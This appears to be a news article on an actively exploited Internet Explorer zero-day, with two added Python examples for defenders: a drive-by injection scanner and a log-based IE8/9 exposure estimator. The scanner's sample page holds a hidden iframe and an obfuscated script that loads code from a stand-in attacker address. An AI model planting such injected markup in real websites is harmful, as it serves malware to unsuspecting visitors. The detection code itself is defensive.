IE zero-day actively being exploited in the wild: Rapid7

Criminals are actively abusing the zero-day vulnerability found in Internet Explorer, with exploit code now circulating in the wild.
Written by Michael Lee, Contributor

Businesses running Internet Explorer should consider taking better precautions now that code to exploit a recently discovered zero-day vulnerability in the browser is making the rounds.

According to Rapid7 senior engineering manager Ross Barrett, exploit code is now being widely distributed on the web. He said that earlier this week he had seen exploit code submitted to VirusTotal and Scumware.

Attackers typically exploit weaknesses in websites, for example taking advantage of out-of-date WordPress installations to upload their own content to the server. They then use spam or phishing campaigns to herd unsuspecting users to these "drive-by" sites, which in turn exploit the visitors' browsers directly.
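A site owner's first question after reading this is whether their own pages have already been turned into one of those drive-by landing pages. The following is an added example, not code from the article or from Rapid7, that scans a page for the usual signs of injected content: iframes hidden by zero size, CSS or off-screen positioning, inline scripts that build markup via `document.write(unescape(...))` or `eval(unescape(...))`, and script tags loading from a host other than the site's own. The page HTML, the site host `www.example-blog.org` and the 203.0.113.7 address (a documentation range) are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a WordPress-style page with an injected hidden iframe and an
# obfuscated inline script, as seen on compromised sites used for drive-by attacks.
SAMPLE_HTML = """<html><head><title>Blog</title>
<script src="https://www.example-blog.org/wp-includes/js/jquery.js"></script>
</head><body>
<p>Welcome to my blog.</p>
<iframe src="http://203.0.113.7/in.php" width="0" height="0" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Cscript src=%22http://203.0.113.7/x.js%22%3E%3C/script%3E'));</script>
</body></html>"""

OBFUSCATION_RE = re.compile(r"(?:eval|document\.write)\s*\(\s*unescape\s*\(", re.I)
OFFSCREEN_RE = re.compile(r"(?:left|top):-\d{3,}px")


class InjectionScanner(HTMLParser):
    """Collects (kind, detail) findings for content typical of drive-by injection."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []
        self._script_buf = None  # non-None while inside an inline <script>

    @staticmethod
    def _is_hidden(attrs):
        style = (attrs.get("style") or "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            return True
        if OFFSCREEN_RE.search(style):
            return True
        for dim in ("width", "height"):
            value = (attrs.get(dim) or "").strip().rstrip("px")
            if value.isdigit() and int(value) <= 1:
                return True
        return False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): v for k, v in attrs}
        if tag == "iframe" and self._is_hidden(a):
            self.findings.append(("hidden_iframe", a.get("src", "")))
        elif tag == "script":
            src = a.get("src")
            if src:
                host = (urlparse(src).hostname or "").lower()
                if host and host != self.site_host:
                    self.findings.append(("external_script", src))
            else:
                self._script_buf = []

    def handle_data(self, data):
        if self._script_buf is not None:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_buf is not None:
            body = "".join(self._script_buf).strip()
            self._script_buf = None
            if OBFUSCATION_RE.search(body):
                self.findings.append(("obfuscated_inline_script", body[:60]))


def scan(html, site_host):
    """Return the list of (kind, detail) findings for one page of HTML."""
    scanner = InjectionScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for kind, detail in scan(SAMPLE_HTML, "www.example-blog.org"):
        print(f"{kind}: {detail}")
```

Run it over the rendered output of your own site (curl with a browser User-Agent, since injected code is often served only to browsers and not to search-engine crawlers). A hit is a reason to pull the server's files and compare them to a clean WordPress release, not proof in itself; legitimate themes do occasionally use hidden iframes and third-party script hosts, which is why the site host is a parameter.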

These sites eventually get reported to services such as VirusTotal and Scumware, helping others identify them as malicious. Submission volume also has a secondary effect: it is a good indicator of how widely known a given exploit is.

Barrett claims that with the high incidence of reports, the zero day is "about to become [as] severe as any browser issue can be".

He said that exploitation appears to be limited to versions 8 and 9 of the browser, even though all versions are vulnerable at this point.

According to StatCounter, for the year thus far, Internet Explorer 8 and 9 represent 20.15 percent of all browsers. Including all versions of Internet Explorer puts its market share at 27.98 percent.
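Global StatCounter figures say little about any one organisation's exposure; what matters is how many of your own users browse with IE, and in particular with IE 8 or 9, the versions the exploit code in circulation targets. The following is an added example, not part of the article, that works this out from web proxy or server logs in Apache combined format. It reads the real version from the Trident engine token (Trident/4.0 is IE8, 5.0 is IE9, 6.0 is IE10) because Compatibility View rewrites the MSIE token to 7.0 while leaving Trident intact, so counting on MSIE alone undercounts IE8 and IE9. The log lines and addresses are constructed for the example.

```python
import re
from collections import Counter, defaultdict

# Constructed sample log lines (Apache combined format; User-Agent is the last quoted field).
# 10.0.0.7 is an IE9 user in Compatibility View: MSIE 7.0 but Trident/5.0.
SAMPLE_LOGS = """\
10.0.0.5 - - [20/Sep/2012:09:01:02 +1000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
10.0.0.6 - - [20/Sep/2012:09:01:05 +1000] "GET /news HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
10.0.0.7 - - [20/Sep/2012:09:02:11 +1000] "GET /about HTTP/1.1" 200 1024 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0)"
10.0.0.8 - - [20/Sep/2012:09:03:20 +1000] "GET / HTTP/1.1" 200 300 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0)"
10.0.0.9 - - [20/Sep/2012:09:04:00 +1000] "GET / HTTP/1.1" 200 300 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1"
10.0.0.5 - - [20/Sep/2012:09:05:30 +1000] "GET /login HTTP/1.1" 200 700 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
"""

# Layout engine token to real IE major version. IE6 and IE7 carry no Trident token.
TRIDENT_TO_IE = {"4.0": 8, "5.0": 9, "6.0": 10, "7.0": 11}
MSIE_RE = re.compile(r"MSIE (\d+)\.\d+")
TRIDENT_RE = re.compile(r"Trident/(\d+\.\d+)")
UA_FIELD_RE = re.compile(r'"([^"]*)"\s*$')


def ie_version(user_agent):
    """Return the real IE major version for a User-Agent, or None if it is not IE."""
    m = TRIDENT_RE.search(user_agent)
    if m and m.group(1) in TRIDENT_TO_IE:
        return TRIDENT_TO_IE[m.group(1)]
    m = MSIE_RE.search(user_agent)
    return int(m.group(1)) if m else None


def ie_exposure(log_text, exploited_versions=(8, 9)):
    """Summarise IE usage in combined-format logs.

    Returns request counts per IE version, the client addresses seen on each
    version, the clients on versions targeted by the circulating exploit code,
    and every client running any IE version (all of which are vulnerable).
    """
    requests = Counter()
    hosts = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        client = line.split(" ", 1)[0]
        m = UA_FIELD_RE.search(line)
        if not m:
            continue
        version = ie_version(m.group(1))
        if version is None:
            continue
        requests[version] += 1
        hosts[version].add(client)
    exploited = set().union(*(hosts[v] for v in exploited_versions if v in hosts)) if hosts else set()
    all_ie = set().union(*hosts.values()) if hosts else set()
    return {
        "requests_by_version": dict(requests),
        "hosts_by_version": {v: sorted(h) for v, h in hosts.items()},
        "exploited_hosts": exploited,
        "all_ie_hosts": all_ie,
    }


if __name__ == "__main__":
    report = ie_exposure(SAMPLE_LOGS)
    for version, count in sorted(report["requests_by_version"].items()):
        print(f"IE{version}: {count} requests from {report['hosts_by_version'][version]}")
    print("clients on versions the exploit targets:", sorted(report["exploited_hosts"]))
    print("clients on any IE version:", sorted(report["all_ie_hosts"]))
```

Feed it `proxy.log` or the web server's access log for the last week and the "exploited_hosts" set is the list of machines to deal with first, since the advice in this article (patch, upgrade) does not close the hole on any of them. The User-Agent is client-supplied, so treat the result as an estimate rather than an inventory.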

Barrett suggests that users simply avoid Internet Explorer rather than expose themselves to unnecessary risk. For those who must use it, he said they should install all patches and upgrade to the latest version, although he admits that neither action will do much to directly mitigate this vulnerability at this time.

The vulnerability was reported by Microsoft in mid-September, but details of it only emerged earlier this week. Attackers are alleged to have already used the vulnerability to target Japanese organisations.
